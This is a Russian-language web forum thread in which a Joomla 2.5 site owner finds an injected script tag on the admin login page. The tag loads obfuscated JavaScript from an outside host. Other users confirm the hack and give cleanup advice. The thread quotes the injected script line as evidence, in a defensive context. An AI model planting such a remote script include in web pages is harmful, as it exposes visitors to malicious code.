0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1444 Просмотров
*

mystique

  • Захожу иногда
  • 169
  • 4 / 0
Сайтик на Joomla 2.5. При попытке входа в админку (после ввода пароля) выскочило сообщение:

Последний запрос был отклонён, поскольку он содержит неправильный параметр безопасности (security token). Пожалуйста, обновите страницу и попробуйте еще раз.

Показалось подозрительным. Решил посмотреть код этой странички. И вот что я увидел:

Код
<body>Последний запрос был отклонён, поскольку он содержит неправильный параметр безопасности (security token). Пожалуйста, обновите страницу и попробуйте еще раз.<script src="//promo.supermegabest.com/static/js/intersection.js?219201410"></script></body>

Особо подозрительной показалась следующая строчка:
<script src="//promo.supermegabest.com/static/js/intersection.js?219201410"></script>


Что за супермегабест? Скачал этот скриптик и... Ничего в нем не понял. Прикладываю в аттаче. Не подскажете, что именно с сайтом сделали, и как теперь это починить? Визуально в работе сайта ничего странного пока не обнаруживается. Но интуиция подсказывает, что это временно. ;(

Большая просьба помочь советом! ;)
« Последнее редактирование: 23.10.2014, 10:44:13 от ELLE »
*

winstrool

  • Давно я тут
  • 813
  • 51 / 2
  • Свободен для работы
Re: Меня взломали, да? Посоветуйте!
« Ответ #1 : 23.10.2014, 10:35:56 »
В аттаче оббусифецированный JS. Его явно быть не должно! Можете смело приступать к чистке своего сайта!
*

mystique

  • Захожу иногда
  • 169
  • 4 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #2 : 23.10.2014, 10:40:52 »
Спасибо! Жаль, конечно... Пароли на серваке тоже менять? Или достаточно будет только сайт из бэкапа вытащить?
*

winstrool

  • Давно я тут
  • 813
  • 51 / 2
  • Свободен для работы
Re: Меня взломали, да? Посоветуйте!
« Ответ #3 : 23.10.2014, 10:44:46 »
Пароли надо везде менять!, Сайт из бэкапа не достаточно будет вытащить, проблему нужно устранять на корню, он же не просто так, там оказался... обновляйте используемые компоненты, проводите профилактические работы, сервак посмотрите на реверс...
*

ELLE

  • Глобальный модератор
  • 4513
  • 890 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #4 : 23.10.2014, 10:45:22 »
Ребята, просили же - не выкладывать и не прикреплять к темам вредоносный код. Вы ведь не хотите, чтоб завтра ваш антивирус не пустил вас (и еще несколько тысяч человек) на форум
*

draff

  • Гуру
  • 5073
  • 353 / 7
  • ищу работу
Re: Меня взломали, да? Посоветуйте!
« Ответ #5 : 23.10.2014, 10:46:04 »
Или достаточно будет только сайт из бэкапа вытащить?
Нужно найти и шелл, через который выполнили внедрение вируса.Обновить Joomla и все расширения
*

mystique

  • Захожу иногда
  • 169
  • 4 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #6 : 23.10.2014, 10:50:47 »
Всем большое спасибо! Пошел чистить, лечить, материться. ;)


Elle, прошу пардону... Не подумал, что может повредить кому-то скриптик, про который явно написано, что вредительский, и что его лучше не запускать. Был виноват. Ошибку осознал. Больше так не буду.  ;(

*

ELLE

  • Глобальный модератор
  • 4513
  • 890 / 0
Re: Меня взломали, да? Посоветуйте!
« Ответ #7 : 23.10.2014, 10:56:25 »
Заливайте все вредительское на файлопомойки или к себе на сервер :).
Форум быстро индексируется, уже через 30-40минут в выдаче того же Google может появится клеймо "этот сайт может угрожать...", кому это надо из-за одного нехорошего человека, который правила раздела не прочитал
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 138
Последний ответ 29.08.2020, 00:25:24
от cntrl
Реклама (взломали сайт)

Автор Emusarce

Ответов: 15
Просмотров: 869
Последний ответ 18.01.2019, 10:41:27
от ProtectYourSite
Кто эти люди у меня на сайте?

Автор E.Zhenya

Ответов: 12
Просмотров: 1008
Последний ответ 28.07.2018, 14:45:05
от voland
Есть сайт, легко ли его у меня взломают если захотят?

Автор RazarioAgro

Ответов: 3
Просмотров: 698
Последний ответ 05.07.2018, 23:48:25
от ProtectYourSite
Наверное меня взломали

Автор serg450453

Ответов: 18
Просмотров: 831
Последний ответ 22.01.2018, 10:50:39
от ProtectYourSite